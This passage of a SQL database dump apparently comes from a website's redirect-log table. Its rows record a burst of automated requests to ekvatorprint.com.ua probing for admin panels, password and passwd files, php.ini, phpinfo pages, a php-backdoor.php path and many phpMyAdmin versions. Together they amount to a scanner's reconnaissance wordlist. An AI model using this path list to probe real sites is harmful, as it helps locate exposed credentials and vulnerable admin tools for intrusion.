00:00:00',301),(7702,'http://ekvatorprint.com.ua/pages/admin/admin-login.',NULL,'','',1,0,'2017-01-20 13:28:56','0000-00-00 00:00:00',301),(7703,'http://ekvatorprint.com.ua/pages/admin/admin-login.html',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7704,'http://ekvatorprint.com.ua/painel/config/config.php.example',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7705,'http://ekvatorprint.com.ua/panel-administracion/',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7706,'http://ekvatorprint.com.ua/panel-administracion/admin.php',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7707,'http://ekvatorprint.com.ua/panel-administracion/admin.',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7708,'http://ekvatorprint.com.ua/panel-administracion/admin.html',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7709,'http://ekvatorprint.com.ua/panel-administracion/index.php',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7710,'http://ekvatorprint.com.ua/panel-administracion/index.',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7711,'http://ekvatorprint.com.ua/panel-administracion/login.',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7712,'http://ekvatorprint.com.ua/panel-administracion/index.html',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7713,'http://ekvatorprint.com.ua/panel-administracion/login.php',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7714,'http://ekvatorprint.com.ua/panel-administracion/login.html',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7715,'http://ekvatorprint.com.ua/panel/',NULL,'','',2,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7716,'http://ekvatorprint.com.ua/papers',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7717,'http://ekvatorprint.com.ua/partners',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7718,'http://ekvatorprint.com.ua/partner',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7719,'http://ekvatorprint.com.ua/pass',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7720,'http://ekvatorprint.com.ua/pass.txt',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7721,'http://ekvatorprint.com.ua/pass.dat',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7722,'http://ekvatorprint.com.ua/passWD.txt',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7723,'http://ekvatorprint.com.ua/package.json',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7724,'http://ekvatorprint.com.ua/padmin',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7725,'http://ekvatorprint.com.ua/passWords.txt',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7726,'http://ekvatorprint.com.ua/passes.txt',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7727,'http://ekvatorprint.com.ua/passlist',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7728,'http://ekvatorprint.com.ua/passlist.txt',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7729,'http://ekvatorprint.com.ua/passwd',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7730,'http://ekvatorprint.com.ua/passwd.adjunct',NULL,'','',1,0,'2017-01-20 13:28:57','0000-00-00 00:00:00',301),(7731,'http://ekvatorprint.com.ua/passwd.bak',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7732,'http://ekvatorprint.com.ua/passwd.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7733,'http://ekvatorprint.com.ua/passwd/',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7734,'http://ekvatorprint.com.ua/password',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7735,'http://ekvatorprint.com.ua/password.php',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7736,'http://ekvatorprint.com.ua/password.',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7737,'http://ekvatorprint.com.ua/password.html',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7738,'http://ekvatorprint.com.ua/password.log',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7739,'http://ekvatorprint.com.ua/password.mdb',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7740,'http://ekvatorprint.com.ua/password.sqlite',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7741,'http://ekvatorprint.com.ua/password.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7742,'http://ekvatorprint.com.ua/passwordList.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7743,'http://ekvatorprint.com.ua/passwordlist.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7744,'http://ekvatorprint.com.ua/passwordlist/',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7745,'http://ekvatorprint.com.ua/passwordlists/',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7746,'http://ekvatorprint.com.ua/passwords',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7747,'http://ekvatorprint.com.ua/passwords.html',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7748,'http://ekvatorprint.com.ua/panel.php',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7749,'http://ekvatorprint.com.ua/passwords.mdb',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7750,'http://ekvatorprint.com.ua/passwords.sqlite',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7751,'http://ekvatorprint.com.ua/passwords.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7752,'http://ekvatorprint.com.ua/passwords/',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7753,'http://ekvatorprint.com.ua/patient/login.do',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7754,'http://ekvatorprint.com.ua/patient/register.do',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7755,'http://ekvatorprint.com.ua/payment.php',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7756,'http://ekvatorprint.com.ua/pbmadmin',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7757,'http://ekvatorprint.com.ua/pb-admin',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7758,'http://ekvatorprint.com.ua/pbmadmin/',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7759,'http://ekvatorprint.com.ua/pbserver/pbserver.dll',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7760,'http://ekvatorprint.com.ua/pbadmin',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7761,'http://ekvatorprint.com.ua/pcadmin',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7762,'http://ekvatorprint.com.ua/pdf',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7763,'http://ekvatorprint.com.ua/passWord.txt',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7764,'http://ekvatorprint.com.ua/peienadmin',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7765,'http://ekvatorprint.com.ua/people',NULL,'','',1,0,'2017-01-20 13:28:58','0000-00-00 00:00:00',301),(7766,'http://ekvatorprint.com.ua/perl',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7767,'http://ekvatorprint.com.ua/peradmin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7768,'http://ekvatorprint.com.ua/personal.mdb',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7769,'http://ekvatorprint.com.ua/petstore',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7770,'http://ekvatorprint.com.ua/personal',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7771,'http://ekvatorprint.com.ua/personal.sqlite',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7772,'http://ekvatorprint.com.ua/pgadmin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7773,'http://ekvatorprint.com.ua/petstore/',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7774,'http://ekvatorprint.com.ua/phmyadmin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7775,'http://ekvatorprint.com.ua/pgadmin.log',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7776,'http://ekvatorprint.com.ua/phinx.yml',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7777,'http://ekvatorprint.com.ua/phone',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7778,'http://ekvatorprint.com.ua/photos',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7779,'http://ekvatorprint.com.ua/photo',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7780,'http://ekvatorprint.com.ua/photoadmin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7781,'http://ekvatorprint.com.ua/php-backdoor.php',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7782,'http://ekvatorprint.com.ua/php-bin/',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7783,'http://ekvatorprint.com.ua/php-cgi.core',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7784,'http://ekvatorprint.com.ua/php-cli.ini',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7785,'http://ekvatorprint.com.ua/php-cs-fixer.phar',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7786,'http://ekvatorprint.com.ua/payment.',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7787,'http://ekvatorprint.com.ua/php-errors.log',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7788,'http://ekvatorprint.com.ua/php-error',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7789,'http://ekvatorprint.com.ua/php-my-admin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7790,'http://ekvatorprint.com.ua/php-info.php',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7791,'http://ekvatorprint.com.ua/php-myadmin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7792,'http://ekvatorprint.com.ua/php-my-admin/',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7793,'http://ekvatorprint.com.ua/pdf_admin',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7794,'http://ekvatorprint.com.ua/php-myadmin/',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7795,'http://ekvatorprint.com.ua/php.core',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7796,'http://ekvatorprint.com.ua/php.ini',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7797,'http://ekvatorprint.com.ua/php.ini-orig.txt',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7798,'http://ekvatorprint.com.ua/php.ini_',NULL,'','',1,0,'2017-01-20 13:28:59','0000-00-00 00:00:00',301),(7799,'http://ekvatorprint.com.ua/php.lnk',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7800,'http://ekvatorprint.com.ua/php.ini.sample',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7801,'http://ekvatorprint.com.ua/php.ini~',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7802,'http://ekvatorprint.com.ua/php.php',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7803,'http://ekvatorprint.com.ua/php.log',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7804,'http://ekvatorprint.com.ua/php4.ini',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7805,'http://ekvatorprint.com.ua/php/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7806,'http://ekvatorprint.com.ua/php/dev/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7807,'http://ekvatorprint.com.ua/php5.fcgi',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7808,'http://ekvatorprint.com.ua/php5.ini',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7809,'http://ekvatorprint.com.ua/phpInfo.',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7810,'http://ekvatorprint.com.ua/phpInfo.php',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7811,'http://ekvatorprint.com.ua/phpMyA/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7812,'http://ekvatorprint.com.ua/phpMyAdmi/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7813,'http://ekvatorprint.com.ua/phpMyAdmin',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7814,'http://ekvatorprint.com.ua/phpMyAdmin-2.10.1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7815,'http://ekvatorprint.com.ua/phpMyAdmin-2.10.3/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7816,'http://ekvatorprint.com.ua/phpMyAdmin-2.10.0/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7817,'http://ekvatorprint.com.ua/phpMyAdmin-2.10.2/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7818,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.0/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7819,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7820,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.10/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7821,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.2/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7822,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.3/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7823,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.5/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7824,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.6/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7825,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.7/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7826,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.9/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7827,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.8.1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7828,'http://ekvatorprint.com.ua/phpMyAdmin-2.2.6/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7829,'http://ekvatorprint.com.ua/phpMyAdmin-2.2.3/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7830,'http://ekvatorprint.com.ua/phpMyAdmin-2.5.1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7831,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.0/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7832,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.0-pl1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7833,'http://ekvatorprint.com.ua/phpMyAdmin-2.5.4/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7834,'http://ekvatorprint.com.ua/phpMyAdmin-2.5.6/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7835,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.2-rc1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7836,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.3/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7837,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.3-rc1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7838,'http://ekvatorprint.com.ua/phpMyAdmin-2.6.3-pl1/',NULL,'','',1,0,'2017-01-20 13:29:00','0000-00-00 00:00:00',301),(7839,'http://ekvatorprint.com.ua/phpMyAdmin-2/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7840,'http://ekvatorprint.com.ua/phpMyAdmin-3.0.0/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7841,'http://ekvatorprint.com.ua/phpMyAdmin-3.0.1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7842,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.0/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7843,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7844,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.2/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7845,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.3/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7846,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.4/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7847,'http://ekvatorprint.com.ua/phpMyAdmin-3.1.5/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7848,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.0/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7849,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7850,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.3/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7851,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.2/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7852,'http://ekvatorprint.com.ua/phpMy/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7853,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.4/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7854,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.0/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7855,'http://ekvatorprint.com.ua/phpMyAdmin-3.2.5/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7856,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7857,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.4/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7858,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.3-rc1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7859,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.2-rc1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7860,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.3/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7861,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.2/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7862,'http://ekvatorprint.com.ua/phpMyAdmin-3.3.4-rc1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7863,'http://ekvatorprint.com.ua/phpMyAdmin-3/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7864,'http://ekvatorprint.com.ua/phpMyAdmin-4/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7865,'http://ekvatorprint.com.ua/phpMyAdmin.php',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7866,'http://ekvatorprint.com.ua/phpMyAdmin/',NULL,'','',2,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7867,'http://ekvatorprint.com.ua/phpMyAdmin.',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7868,'http://ekvatorprint.com.ua/phpMyAdmin/scripts/setup.php',NULL,'','',20,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7869,'http://ekvatorprint.com.ua/phpMyAdmin1/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7870,'http://ekvatorprint.com.ua/phpMyAdmin4/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7871,'http://ekvatorprint.com.ua/phpMyAdmin0/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7872,'http://ekvatorprint.com.ua/phpMyAds/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7873,'http://ekvatorprint.com.ua/phpMyAdminBackup/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7874,'http://ekvatorprint.com.ua/phpPgAdmin/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7875,'http://ekvatorprint.com.ua/phpRedisAdmin/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7876,'http://ekvatorprint.com.ua/phpThumb/',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7877,'http://ekvatorprint.com.ua/phpThumb.php',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7878,'http://ekvatorprint.com.ua/php_cli_errors.log',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7879,'http://ekvatorprint.com.ua/php_error.log',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7880,'http://ekvatorprint.com.ua/php_error_log',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7881,'http://ekvatorprint.com.ua/php_errorlog',NULL,'','',1,0,'2017-01-20 13:29:01','0000-00-00 00:00:00',301),(7882,'http://ekvatorprint.com.ua/php_errors.log',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7883,'http://ekvatorprint.com.ua/php_my_admin',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7884,'http://ekvatorprint.com.ua/phpadmin',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7885,'http://ekvatorprint.com.ua/phpadminmy/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7886,'http://ekvatorprint.com.ua/phpadmin/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7887,'http://ekvatorprint.com.ua/phperrors.log',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7888,'http://ekvatorprint.com.ua/phpinfo',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7889,'http://ekvatorprint.com.ua/phpinfo.php',NULL,'','',4,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7890,'http://ekvatorprint.com.ua/phpinfo.',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7891,'http://ekvatorprint.com.ua/phpinfo.php3',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7892,'http://ekvatorprint.com.ua/phpinfo.php4',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7893,'http://ekvatorprint.com.ua/phpinfo.php5',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7894,'http://ekvatorprint.com.ua/phpini.bak',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7895,'http://ekvatorprint.com.ua/phpldapadmin',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7896,'http://ekvatorprint.com.ua/phpldapadmin/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7897,'http://ekvatorprint.com.ua/phpliteadmin.php',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7898,'http://ekvatorprint.com.ua/phpm/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7899,'http://ekvatorprint.com.ua/phpma/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7900,'http://ekvatorprint.com.ua/phpmem/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7901,'http://ekvatorprint.com.ua/phpmanager/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7902,'http://ekvatorprint.com.ua/phpmy/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7903,'http://ekvatorprint.com.ua/phpmemcachedadmin/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7904,'http://ekvatorprint.com.ua/phpmyad-sys/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7905,'http://ekvatorprint.com.ua/phpmy-admin/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7906,'http://ekvatorprint.com.ua/phpmyadmin',NULL,'','',5,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7907,'http://ekvatorprint.com.ua/phpmyad/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7908,'http://ekvatorprint.com.ua/phpmyadmin!!',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7909,'http://ekvatorprint.com.ua/phpmyadmin-old',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7910,'http://ekvatorprint.com.ua/phpmyadmin1/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7911,'http://ekvatorprint.com.ua/phpmyadmin0/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7912,'http://ekvatorprint.com.ua/phpmyadmin/scripts/setup.php',NULL,'','',16,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7913,'http://ekvatorprint.com.ua/phpmyadmin2/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7914,'http://ekvatorprint.com.ua/phpmyadmin2',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7915,'http://ekvatorprint.com.ua/phpmyadmin3',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7916,'http://ekvatorprint.com.ua/phpmyadmin3/',NULL,'','',1,0,'2017-01-20 13:29:02','0000-00-00 00:00:00',301),(7917,'http://ekvatorprint.com.ua/phpredmin/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 